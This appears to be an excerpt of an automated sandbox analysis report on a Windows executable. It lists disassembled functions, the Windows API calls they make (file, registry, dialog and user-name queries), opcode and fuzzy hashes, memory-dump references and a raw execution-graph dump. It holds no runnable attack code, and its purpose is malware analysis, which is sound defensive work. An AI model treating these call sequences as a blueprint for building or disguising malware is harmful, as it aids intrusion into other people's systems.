                                        • Instruction Fuzzy Hash: 69012976555209BFDF11AFA0AD89EEE7B6DEB1A350F100065F601D20A0EB718E50AB64
                                        Function 00294264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(00010414), ref: 00294291
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010414,00290110,?), ref: 002942BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DialogParamVisibleWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 3157717868-3292211884
                                        • Opcode ID: f5f4dcddaf965544eb3fe823c249fbc663f0399e4a4968ae65071d42d4ec6278
                                        • Instruction ID: 04e7e1d4bca2481698ddf370d820876b9e88dd8d8641cba1b8a53bb392f9a88a
                                        • Opcode Fuzzy Hash: f5f4dcddaf965544eb3fe823c249fbc663f0399e4a4968ae65071d42d4ec6278
                                        • Instruction Fuzzy Hash: D801D6306B5765ABCF10BF64AC0EF6637C8BB02300B458255FC0593191CAB0A8B1CF61
                                        Function 002875ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,0028770A,?,?,0028777F,?,?,?,?,?,00287769), ref: 002875F3
                                        • GetLastError.KERNEL32(?,?,0028777F,?,?,?,?,?,00287769), ref: 002875FF
                                          • Part of subcall function 002792EB: __EH_prolog3_GS.LIBCMT ref: 002792F2
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00287608
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorH_prolog3_LastObjectSingleWait
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 2419225763-2248577382
                                        • Opcode ID: cf797f9a8f8e8646af755367ab4af089ff6813c431f7a23c376b79a71120858a
                                        • Instruction ID: e0575d1e5511218f25d4dba57623fcb1dad1fe341455977f2d17b403430cc7f8
                                        • Opcode Fuzzy Hash: cf797f9a8f8e8646af755367ab4af089ff6813c431f7a23c376b79a71120858a
                                        • Instruction Fuzzy Hash: 73D05E3152D931B7D91037686C0ECEE390D9B23730F714754FA39652E6DE2008A146AD
                                        Function 00283E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,D946AC94), ref: 00283E65
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00283E73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: 8f301c717f845a26e019ee801062374c616f8bb3a69ad018d8f9c289e236306c
                                        • Instruction ID: 13861e3d394c5fb476f3d03290887a2f21c0f4aff4606b29863db7b5109d879f
                                        • Opcode Fuzzy Hash: 8f301c717f845a26e019ee801062374c616f8bb3a69ad018d8f9c289e236306c
                                        • Instruction Fuzzy Hash: 41C0803175071097E73417717C0DB432D585F17B15F15045CB505990C0DDE5D4508BD0

                                        Execution Graph

                                        Execution Coverage:3.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.5%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:65
                                        execution_graph 91551 7455f4 91560 70e34f 91551->91560 91553 74560a 91555 745685 91553->91555 91569 70a9e5 9 API calls 91553->91569 91557 74617b 91555->91557 91571 763ef6 81 API calls __wsopen_s 91555->91571 91558 745665 91558->91555 91570 762393 8 API calls 91558->91570 91561 70e370 91560->91561 91562 70e35d 91560->91562 91563 70e3a3 91561->91563 91564 70e375 91561->91564 91572 6fb3fe 8 API calls 91562->91572 91582 6fb3fe 8 API calls 91563->91582 91573 71016b 91564->91573 91568 70e367 91568->91553 91569->91558 91570->91555 91571->91557 91572->91568 91574 710170 ___std_exception_copy 91573->91574 91575 71018a 91574->91575 91578 71018c 91574->91578 91583 71523d 7 API calls 2 library calls 91574->91583 91575->91568 91577 7109fd 91585 713634 RaiseException 91577->91585 91578->91577 91584 713634 RaiseException 91578->91584 91581 710a1a 91581->91568 91582->91568 91583->91574 91584->91577 91585->91581 91586 728792 91591 72854e 91586->91591 91589 7287ba 91592 72857f try_get_first_available_module 91591->91592 91599 7286c8 91592->91599 91606 71919b 91592->91606 91594 72877e 91615 722b7c 26 API calls _abort 91594->91615 91596 7286d3 91596->91589 91603 730d24 91596->91603 91599->91596 91614 71f669 20 API calls _abort 91599->91614 91600 71919b 40 API calls 91601 72873b 91600->91601 91601->91599 91602 71919b 40 API calls 91601->91602 91602->91599 91619 730421 91603->91619 91605 730d3f 91605->91589 91607 71923b 91606->91607 91608 7191af 91606->91608 91618 719253 40 API calls 3 library calls 91607->91618 91612 7191d1 91608->91612 91616 71f669 20 API calls _abort 91608->91616 91611 7191c6 91617 722b7c 26 API calls _abort 91611->91617 91612->91599 91612->91600 91614->91594 91615->91596 91616->91611 91617->91612 91618->91612 91622 73042d ___BuildCatchObject 91619->91622 91620 73043b 91676 71f669 20 API calls _abort 91620->91676 91622->91620 91624 730474 91622->91624 91623 730440 91677 722b7c 26 API calls _abort 91623->91677 91630 7309fb 91624->91630 91629 73044a __fread_nolock 91629->91605 91631 730a18 91630->91631 91632 730a46 91631->91632 91633 730a2d 91631->91633 91679 7255b1 91632->91679 91693 71f656 20 API calls _abort 91633->91693 91636 730a32 91694 71f669 20 API calls _abort 91636->91694 91637 730a4b 91638 730a54 91637->91638 91639 730a6b 91637->91639 91695 71f656 20 API calls _abort 91638->91695 91692 73073a CreateFileW 91639->91692 91643 730a59 91696 71f669 20 API calls _abort 91643->91696 91645 730b21 GetFileType 91647 730b73 91645->91647 91648 730b2c GetLastError 91645->91648 91646 730af6 GetLastError 91698 71f633 20 API calls 2 library calls 91646->91698 91701 7254fa 21 API calls 3 library calls 91647->91701 91699 71f633 20 API calls 2 library calls 91648->91699 91649 730aa4 91649->91645 91649->91646 91697 73073a CreateFileW 91649->91697 91653 730b3a CloseHandle 91653->91636 91656 730b63 91653->91656 91655 730ae9 91655->91645 91655->91646 91700 71f669 20 API calls _abort 91656->91700 91657 730b94 91659 730be0 91657->91659 91702 73094b 72 API calls 4 library calls 91657->91702 91664 730c0d 91659->91664 91703 7304ed 72 API calls 3 library calls 91659->91703 91660 730b68 91660->91636 91663 730c06 91663->91664 91666 730c1e 91663->91666 91704 728a3e 91664->91704 91667 730498 91666->91667 91668 730c9c CloseHandle 91666->91668 91678 7304c1 LeaveCriticalSection __wsopen_s 91667->91678 91719 73073a CreateFileW 91668->91719 91670 730cc7 91671 730cfd 91670->91671 91672 730cd1 GetLastError 91670->91672 91671->91667 91720 71f633 20 API calls 2 library calls 91672->91720 91674 730cdd 91721 7256c3 21 API calls 3 library calls 91674->91721 91676->91623 91677->91629 91678->91629 91680 7255bd ___BuildCatchObject 91679->91680 91722 7232ee EnterCriticalSection 91680->91722 91683 7255e9 91726 725390 91683->91726 91684 7255c4 91684->91683 91688 725657 EnterCriticalSection 91684->91688 91691 72560b 91684->91691 91685 725634 __fread_nolock 91685->91637 91690 725664 LeaveCriticalSection 91688->91690 91688->91691 91690->91684 91723 7256ba 91691->91723 91692->91649 91693->91636 91694->91667 91695->91643 91696->91636 91697->91655 91698->91636 91699->91653 91700->91660 91701->91657 91702->91659 91703->91663 91752 725754 91704->91752 91706 728a54 91765 7256c3 21 API calls 3 library calls 91706->91765 91707 728a4e 91707->91706 91709 725754 __wsopen_s 26 API calls 91707->91709 91718 728a86 91707->91718 91712 728a7d 91709->91712 91710 725754 __wsopen_s 26 API calls 91713 728a92 CloseHandle 91710->91713 91711 728aac 91714 728ace 91711->91714 91766 71f633 20 API calls 2 library calls 91711->91766 91715 725754 __wsopen_s 26 API calls 91712->91715 91713->91706 91716 728a9e GetLastError 91713->91716 91714->91667 91715->91718 91716->91706 91718->91706 91718->91710 91719->91670 91720->91674 91721->91671 91722->91684 91734 723336 LeaveCriticalSection 91723->91734 91725 7256c1 91725->91685 91735 72500d 91726->91735 91728 7253a2 91732 7253af 91728->91732 91742 723795 11 API calls 2 library calls 91728->91742 91731 725401 91731->91691 91733 7254d7 EnterCriticalSection 91731->91733 91743 722d58 91732->91743 91733->91691 91734->91725 91740 72501a _abort 91735->91740 91736 72505a 91750 71f669 20 API calls _abort 91736->91750 91737 725045 RtlAllocateHeap 91738 725058 91737->91738 91737->91740 91738->91728 91740->91736 91740->91737 91749 71523d 7 API calls 2 library calls 91740->91749 91742->91728 91744 722d63 RtlFreeHeap 91743->91744 91748 722d8c _free 91743->91748 91745 722d78 91744->91745 91744->91748 91751 71f669 20 API calls _abort 91745->91751 91747 722d7e GetLastError 91747->91748 91748->91731 91749->91740 91750->91738 91751->91747 91753 725761 91752->91753 91755 725776 91752->91755 91767 71f656 20 API calls _abort 91753->91767 91758 72579b 91755->91758 91769 71f656 20 API calls _abort 91755->91769 91757 725766 91768 71f669 20 API calls _abort 91757->91768 91758->91707 91759 7257a6 91770 71f669 20 API calls _abort 91759->91770 91761 72576e 91761->91707 91763 7257ae 91771 722b7c 26 API calls _abort 91763->91771 91765->91711 91766->91714 91767->91757 91768->91761 91769->91759 91770->91763 91771->91761 91772 70f9b1 91773 70f9bb 91772->91773 91775 70f9dc 91772->91775 91781 6fc34b 91773->91781 91780 74fadc 91775->91780 91789 7555d9 8 API calls ISource 91775->91789 91776 70f9cb 91778 6fc34b 8 API calls 91776->91778 91779 70f9db 91778->91779 91782 6fc359 91781->91782 91787 6fc381 ISource 91781->91787 91783 6fc367 91782->91783 91784 6fc34b 8 API calls 91782->91784 91785 6fc36d 91783->91785 91786 6fc34b 8 API calls 91783->91786 91784->91783 91785->91787 91790 6fc780 91785->91790 91786->91785 91787->91776 91789->91775 91792 6fc78b ISource 91790->91792 91791 6fc7c6 ISource 91791->91787 91792->91791 91794 70e29c 91792->91794 91795 70e2a4 91794->91795 91796 70e2c8 91795->91796 91799 6fc700 91795->91799 91796->91791 91798 70e2af ISource 91798->91791 91800 6fc70b 91799->91800 91801 741228 91800->91801 91806 6fc713 ISource 91800->91806 91802 71016b 8 API calls 91801->91802 91804 741234 91802->91804 91803 6fc71a 91803->91798 91805 6fc780 8 API calls 91805->91806 91806->91803 91806->91805 91807 6ff48c 91810 6fca50 91807->91810 91811 6fca6b 91810->91811 91812 741461 91811->91812 91813 7414af 91811->91813 91840 6fca90 91811->91840 91816 74146b 91812->91816 91817 741478 91812->91817 91812->91840 91878 7761ff 254 API calls 2 library calls 91813->91878 91876 776690 254 API calls 91816->91876 91835 6fcd60 91817->91835 91877 776b2d 254 API calls 2 library calls 91817->91877 91822 70e781 39 API calls 91822->91840 91823 741742 91823->91823 91827 6fcd8e 91828 74168b 91885 776569 81 API calls 91828->91885 91835->91827 91886 763ef6 81 API calls __wsopen_s 91835->91886 91836 6fcf30 39 API calls 91836->91840 91840->91822 91840->91827 91840->91828 91840->91835 91840->91836 91841 7002f0 91840->91841 91864 6fbdc1 91840->91864 91868 70e73b 39 API calls 91840->91868 91869 70aa19 254 API calls 91840->91869 91870 7105d2 5 API calls __Init_thread_wait 91840->91870 91871 70bbd2 8 API calls 91840->91871 91872 710433 29 API calls __onexit 91840->91872 91873 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91840->91873 91874 70f4ed 81 API calls 91840->91874 91875 70f354 254 API calls 91840->91875 91879 6fb3fe 8 API calls 91840->91879 91880 74ff4f 8 API calls 91840->91880 91881 6fbe6d 91840->91881 91860 700326 ISource 91841->91860 91842 71016b 8 API calls 91842->91860 91843 7105d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 91843->91860 91844 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 91844->91860 91845 7462cf 91901 763ef6 81 API calls __wsopen_s 91845->91901 91847 701645 91852 6fbe6d 8 API calls 91847->91852 91858 70044d ISource 91847->91858 91849 7461fe 91900 763ef6 81 API calls __wsopen_s 91849->91900 91850 700a5e ISource 91899 763ef6 81 API calls __wsopen_s 91850->91899 91851 745c7f 91857 6fbe6d 8 API calls 91851->91857 91851->91858 91852->91858 91855 6fbe6d 8 API calls 91855->91860 91857->91858 91858->91840 91859 6fbf07 8 API calls 91859->91860 91860->91842 91860->91843 91860->91844 91860->91845 91860->91847 91860->91849 91860->91850 91860->91851 91860->91855 91860->91858 91860->91859 91861 710433 29 API calls pre_c_initialization 91860->91861 91862 7460b9 91860->91862 91887 701e00 91860->91887 91897 701940 254 API calls 2 library calls 91860->91897 91861->91860 91898 763ef6 81 API calls __wsopen_s 91862->91898 91865 6fbdcc 91864->91865 91866 6fbdfb 91865->91866 91905 6fbf39 39 API calls 91865->91905 91866->91840 91868->91840 91869->91840 91870->91840 91871->91840 91872->91840 91873->91840 91874->91840 91875->91840 91876->91817 91877->91835 91878->91840 91879->91840 91880->91840 91882 6fbe81 91881->91882 91884 6fbe90 __fread_nolock 91881->91884 91882->91884 91906 71019b 91882->91906 91884->91840 91885->91835 91886->91823 91888 701e1d ISource 91887->91888 91889 701fa7 ISource 91888->91889 91890 7024c2 91888->91890 91892 70e29c 8 API calls 91888->91892 91893 7477db 91888->91893 91896 74760f 91888->91896 91889->91860 91890->91889 91904 70bd82 39 API calls 91890->91904 91892->91888 91893->91889 91903 71d2f5 39 API calls 91893->91903 91902 71d2f5 39 API calls 91896->91902 91897->91860 91898->91850 91899->91858 91900->91858 91901->91858 91902->91896 91903->91889 91904->91889 91905->91866 91907 71016b ___std_exception_copy 91906->91907 91908 71018a 91907->91908 91911 71018c 91907->91911 91915 71523d 7 API calls 2 library calls 91907->91915 91908->91884 91910 7109fd 91917 713634 RaiseException 91910->91917 91911->91910 91916 713634 RaiseException 91911->91916 91914 710a1a 91914->91884 91915->91907 91916->91910 91917->91914 91918 74e6dd 91919 74e68a 91918->91919 91921 75e753 SHGetFolderPathW 91919->91921 91924 6f84b7 91921->91924 91923 75e780 91923->91919 91925 7365bb 91924->91925 91926 6f84c7 _wcslen 91924->91926 91937 6f96d9 91925->91937 91929 6f84dd 91926->91929 91930 6f8502 91926->91930 91928 7365c4 91928->91928 91936 6f8894 8 API calls 91929->91936 91932 71016b 8 API calls 91930->91932 91933 6f850e 91932->91933 91935 71019b 8 API calls 91933->91935 91934 6f84e5 __fread_nolock 91934->91923 91935->91934 91936->91934 91938 6f96e7 91937->91938 91940 6f96f0 __fread_nolock 91937->91940 91938->91940 91941 6fc269 91938->91941 91940->91928 91942 6fc27c 91941->91942 91943 6fc279 __fread_nolock 91941->91943 91944 71016b 8 API calls 91942->91944 91943->91940 91945 6fc287 91944->91945 91946 71019b 8 API calls 91945->91946 91946->91943 91947 74e71e 91948 74e72b LoadLibraryA 91947->91948 91949 74e747 91948->91949 91950 74e737 GetProcAddress 91948->91950 91951 74e762 FreeLibrary 91949->91951 91952 74e610 91949->91952 91950->91949 91951->91952 91953 6f1044 91958 6f2735 91953->91958 91955 6f104a 91994 710433 29 API calls __onexit 91955->91994 91957 6f1054 91995 6f29da 91958->91995 91962 6f27ac 92005 6fbf07 91962->92005 91965 6fbf07 8 API calls 91966 6f27c0 91965->91966 91967 6fbf07 8 API calls 91966->91967 91968 6f27ca 91967->91968 91969 6fbf07 8 API calls 91968->91969 91970 6f2808 91969->91970 91971 6fbf07 8 API calls 91970->91971 91972 6f28d4 91971->91972 92010 6f2d5e 91972->92010 91976 6f2906 91977 6fbf07 8 API calls 91976->91977 91978 6f2910 91977->91978 92031 7030e0 91978->92031 91980 6f293b 92041 6f30ed 91980->92041 91982 6f2957 91983 6f2967 GetStdHandle 91982->91983 91984 7339c1 91983->91984 91987 6f29bc 91983->91987 91985 7339ca 91984->91985 91984->91987 91986 71016b 8 API calls 91985->91986 91989 7339d1 91986->91989 91988 6f29c9 OleInitialize 91987->91988 91988->91955 92048 7609d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 91989->92048 91991 7339da 92049 761200 CreateThread 91991->92049 91993 7339e6 CloseHandle 91993->91987 91994->91957 92050 6f2a33 91995->92050 91998 6f2a33 8 API calls 91999 6f2a12 91998->91999 92000 6fbf07 8 API calls 91999->92000 92001 6f2a1e 92000->92001 92002 6f84b7 8 API calls 92001->92002 92003 6f276b 92002->92003 92004 6f3205 6 API calls 92003->92004 92004->91962 92006 71019b 8 API calls 92005->92006 92007 6fbf1c 92006->92007 92008 71016b 8 API calls 92007->92008 92009 6f27b6 92008->92009 92009->91965 92011 6fbf07 8 API calls 92010->92011 92012 6f2d6e 92011->92012 92013 6fbf07 8 API calls 92012->92013 92014 6f2d76 92013->92014 92015 6fbf07 8 API calls 92014->92015 92016 6f2d91 92015->92016 92017 71016b 8 API calls 92016->92017 92018 6f28de 92017->92018 92019 6f318c 92018->92019 92020 6f319a 92019->92020 92021 6fbf07 8 API calls 92020->92021 92022 6f31a5 92021->92022 92023 6fbf07 8 API calls 92022->92023 92024 6f31b0 92023->92024 92025 6fbf07 8 API calls 92024->92025 92026 6f31bb 92025->92026 92027 6fbf07 8 API calls 92026->92027 92028 6f31c6 92027->92028 92029 71016b 8 API calls 92028->92029 92030 6f31d8 RegisterWindowMessageW 92029->92030 92030->91976 92032 703121 92031->92032 92037 7030fd 92031->92037 92057 7105d2 5 API calls __Init_thread_wait 92032->92057 92035 70312b 92035->92037 92058 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92035->92058 92036 709ec7 92040 70310e 92036->92040 92060 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92036->92060 92037->92040 92059 7105d2 5 API calls __Init_thread_wait 92037->92059 92040->91980 92042 6f30fd 92041->92042 92043 733c69 92041->92043 92044 71016b 8 API calls 92042->92044 92061 763b63 8 API calls 92043->92061 92047 6f3105 92044->92047 92046 733c74 92047->91982 92048->91991 92049->91993 92062 7611e6 14 API calls 92049->92062 92051 6fbf07 8 API calls 92050->92051 92052 6f2a3e 92051->92052 92053 6fbf07 8 API calls 92052->92053 92054 6f2a46 92053->92054 92055 6fbf07 8 API calls 92054->92055 92056 6f2a08 92055->92056 92056->91998 92057->92035 92058->92037 92059->92036 92060->92040 92061->92046 92063 74e5f8 GetUserNameW 92064 74e610 92063->92064 92065 7327a2 92068 6f2a52 92065->92068 92069 7339f4 DestroyWindow 92068->92069 92070 6f2a91 mciSendStringW 92068->92070 92081 733a00 92069->92081 92071 6f2aad 92070->92071 92072 6f2d08 92070->92072 92074 6f2abb 92071->92074 92071->92081 92072->92071 92073 6f2d17 UnregisterHotKey 92072->92073 92073->92072 92100 6f2e70 92074->92100 92077 733a45 92082 733a69 92077->92082 92083 733a58 FreeLibrary 92077->92083 92078 733a1e FindClose 92078->92081 92079 6f2ad0 92079->92082 92087 6f2ade 92079->92087 92081->92077 92081->92078 92106 6f7953 92081->92106 92084 733a7d VirtualFree 92082->92084 92089 6f2b4b 92082->92089 92083->92077 92084->92082 92085 6f2b3a CoUninitialize 92085->92089 92086 733ac5 92092 733ad4 ISource 92086->92092 92110 763c45 6 API calls ISource 92086->92110 92087->92085 92089->92086 92090 6f2b56 92089->92090 92104 6f2f86 VirtualFreeEx CloseHandle 92090->92104 92096 733b63 92092->92096 92111 756d63 8 API calls ISource 92092->92111 92094 6f2b7c 92094->92092 92095 6f2c61 92094->92095 92095->92096 92097 6f2caf 92095->92097 92096->92096 92097->92096 92105 6f2eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 92097->92105 92099 6f2d03 92101 6f2e7d 92100->92101 92102 6f2ac2 92101->92102 92112 7578b9 8 API calls 92101->92112 92102->92077 92102->92079 92104->92094 92105->92099 92107 6f795d 92106->92107 92108 6f796c 92106->92108 92107->92081 92108->92107 92109 6f7971 CloseHandle 92108->92109 92109->92107 92110->92086 92111->92092 92112->92101 92113 6f367c 92116 6f3696 92113->92116 92117 6f36ad 92116->92117 92118 6f36b2 92117->92118 92119 6f3711 92117->92119 92156 6f370f 92117->92156 92123 6f36bf 92118->92123 92124 6f378b PostQuitMessage 92118->92124 92121 6f3717 92119->92121 92122 733dce 92119->92122 92120 6f36f6 DefWindowProcW 92145 6f3690 92120->92145 92125 6f371e 92121->92125 92126 6f3743 SetTimer RegisterWindowMessageW 92121->92126 92172 6f2f24 10 API calls 92122->92172 92127 6f36ca 92123->92127 92128 733e3b 92123->92128 92124->92145 92130 6f3727 KillTimer 92125->92130 92131 733d6f 92125->92131 92132 6f376c CreatePopupMenu 92126->92132 92126->92145 92133 6f3795 92127->92133 92134 6f36d4 92127->92134 92177 75c80c 65 API calls ___scrt_fastfail 92128->92177 92168 6f388e Shell_NotifyIconW ___scrt_fastfail 92130->92168 92138 733d74 92131->92138 92139 733daa MoveWindow 92131->92139 92132->92145 92161 70fcbb 92133->92161 92141 6f36df 92134->92141 92142 733e20 92134->92142 92136 733def 92173 70f1c6 40 API calls 92136->92173 92146 733d7a 92138->92146 92147 733d99 SetFocus 92138->92147 92139->92145 92149 6f36ea 92141->92149 92150 6f3779 92141->92150 92142->92120 92176 751367 8 API calls 92142->92176 92143 733e4d 92143->92120 92143->92145 92146->92149 92151 733d83 92146->92151 92147->92145 92148 6f373a 92169 6f572c DeleteObject DestroyWindow 92148->92169 92149->92120 92174 6f388e Shell_NotifyIconW ___scrt_fastfail 92149->92174 92170 6f37a6 75 API calls ___scrt_fastfail 92150->92170 92171 6f2f24 10 API calls 92151->92171 92156->92120 92157 6f3789 92157->92145 92159 733e14 92175 6f38f2 60 API calls ___scrt_fastfail 92159->92175 92162 70fcd3 ___scrt_fastfail 92161->92162 92163 70fd59 92161->92163 92178 6f5f59 92162->92178 92163->92145 92165 70fd42 KillTimer SetTimer 92165->92163 92166 70fcfa 92166->92165 92167 74fdcb Shell_NotifyIconW 92166->92167 92167->92165 92168->92148 92169->92145 92170->92157 92171->92145 92172->92136 92173->92149 92174->92159 92175->92156 92176->92156 92177->92143 92179 6f6058 92178->92179 92180 6f5f76 92178->92180 92179->92166 92208 6f7a14 92180->92208 92183 735101 LoadStringW 92187 73511b 92183->92187 92184 6f5f91 92185 6f84b7 8 API calls 92184->92185 92186 6f5fa6 92185->92186 92188 6f5fb3 92186->92188 92197 735137 92186->92197 92190 6fbe6d 8 API calls 92187->92190 92193 6f5fd9 ___scrt_fastfail 92187->92193 92188->92187 92189 6f5fbd 92188->92189 92213 6f65a4 92189->92213 92190->92193 92195 6f603e Shell_NotifyIconW 92193->92195 92195->92179 92196 73517a 92232 70fe8f 51 API calls 92196->92232 92197->92193 92197->92196 92198 6fbf07 8 API calls 92197->92198 92199 735161 92198->92199 92231 75a265 9 API calls 92199->92231 92202 73516c 92204 6f7af4 8 API calls 92202->92204 92203 735199 92205 6f65a4 8 API calls 92203->92205 92204->92196 92206 7351aa 92205->92206 92207 6f65a4 8 API calls 92206->92207 92207->92193 92209 71019b 8 API calls 92208->92209 92210 6f7a39 92209->92210 92211 71016b 8 API calls 92210->92211 92212 6f5f84 92211->92212 92212->92183 92212->92184 92214 6f65bb 92213->92214 92215 735629 92213->92215 92233 6f65cc 92214->92233 92217 71016b 8 API calls 92215->92217 92219 735633 _wcslen 92217->92219 92218 6f5fcb 92222 6f7af4 92218->92222 92220 71019b 8 API calls 92219->92220 92221 73566c __fread_nolock 92220->92221 92223 7363b3 92222->92223 92224 6f7b06 92222->92224 92258 6f662b 8 API calls __fread_nolock 92223->92258 92248 6f7b17 92224->92248 92227 6f7b12 92227->92193 92228 7363bd 92229 7363c9 92228->92229 92230 6fbe6d 8 API calls 92228->92230 92230->92229 92231->92202 92232->92203 92234 6f65dc _wcslen 92233->92234 92235 6f65ef 92234->92235 92236 73568b 92234->92236 92243 6f7cb3 92235->92243 92238 71016b 8 API calls 92236->92238 92239 735695 92238->92239 92241 71019b 8 API calls 92239->92241 92240 6f65fc __fread_nolock 92240->92218 92242 7356c5 __fread_nolock 92241->92242 92244 6f7cc4 __fread_nolock 92243->92244 92245 6f7cc9 92243->92245 92244->92240 92246 71019b 8 API calls 92245->92246 92247 7364be 92245->92247 92246->92244 92247->92247 92249 6f7b26 92248->92249 92254 6f7b5a __fread_nolock 92248->92254 92250 7363e4 92249->92250 92251 6f7b4d 92249->92251 92249->92254 92252 71016b 8 API calls 92250->92252 92253 6f7cb3 8 API calls 92251->92253 92255 7363f3 92252->92255 92253->92254 92254->92227 92256 71019b 8 API calls 92255->92256 92257 736427 __fread_nolock 92256->92257 92258->92228 92259 6f105b 92264 6f522e 92259->92264 92261 6f106a 92295 710433 29 API calls __onexit 92261->92295 92263 6f1074 92265 6f523e __wsopen_s 92264->92265 92266 6fbf07 8 API calls 92265->92266 92267 6f52f4 92266->92267 92296 6f551b 92267->92296 92269 6f52fd 92303 6f51bf 92269->92303 92272 6f65a4 8 API calls 92273 6f5316 92272->92273 92309 6f684e 92273->92309 92276 6fbf07 8 API calls 92277 6f532e 92276->92277 92315 6fbceb 92277->92315 92280 734bc0 RegQueryValueExW 92281 734c56 RegCloseKey 92280->92281 92282 734bdd 92280->92282 92285 6f5359 92281->92285 92293 734c68 _wcslen 92281->92293 92283 71019b 8 API calls 92282->92283 92284 734bf6 92283->92284 92321 6f41a6 92284->92321 92285->92261 92288 734c1e 92289 6f84b7 8 API calls 92288->92289 92290 734c38 ISource 92289->92290 92290->92281 92292 6f684e 8 API calls 92292->92293 92293->92285 92293->92292 92294 6f627c 8 API calls 92293->92294 92324 6fb25f 92293->92324 92294->92293 92295->92263 92330 7322f0 92296->92330 92299 6fb25f 8 API calls 92300 6f554e 92299->92300 92332 6f557e 92300->92332 92302 6f5558 92302->92269 92304 7322f0 __wsopen_s 92303->92304 92305 6f51cc GetFullPathNameW 92304->92305 92306 6f51ee 92305->92306 92307 6f84b7 8 API calls 92306->92307 92308 6f520c 92307->92308 92308->92272 92310 6f685d 92309->92310 92314 6f687e __fread_nolock 92309->92314 92312 71019b 8 API calls 92310->92312 92311 71016b 8 API calls 92313 6f5325 92311->92313 92312->92314 92313->92276 92314->92311 92316 6fbd05 92315->92316 92320 6f5337 RegOpenKeyExW 92315->92320 92317 71016b 8 API calls 92316->92317 92318 6fbd0f 92317->92318 92319 71019b 8 API calls 92318->92319 92319->92320 92320->92280 92320->92285 92322 71016b 8 API calls 92321->92322 92323 6f41b8 RegQueryValueExW 92322->92323 92323->92288 92323->92290 92325 6fb26e _wcslen 92324->92325 92326 71019b 8 API calls 92325->92326 92327 6fb296 __fread_nolock 92326->92327 92328 71016b 8 API calls 92327->92328 92329 6fb2ac 92328->92329 92329->92293 92331 6f5528 GetModuleFileNameW 92330->92331 92331->92299 92333 7322f0 __wsopen_s 92332->92333 92334 6f558b GetFullPathNameW 92333->92334 92335 6f55aa 92334->92335 92336 6f55c5 92334->92336 92337 6f84b7 8 API calls 92335->92337 92338 6fbceb 8 API calls 92336->92338 92339 6f55b6 92337->92339 92338->92339 92342 6f79ed 92339->92342 92343 6f79fb 92342->92343 92344 6f96d9 8 API calls 92343->92344 92345 6f55c2 92344->92345 92345->92302 92346 6f1098 92351 6f5d78 92346->92351 92350 6f10a7 92352 6fbf07 8 API calls 92351->92352 92353 6f5d8f GetVersionExW 92352->92353 92354 6f84b7 8 API calls 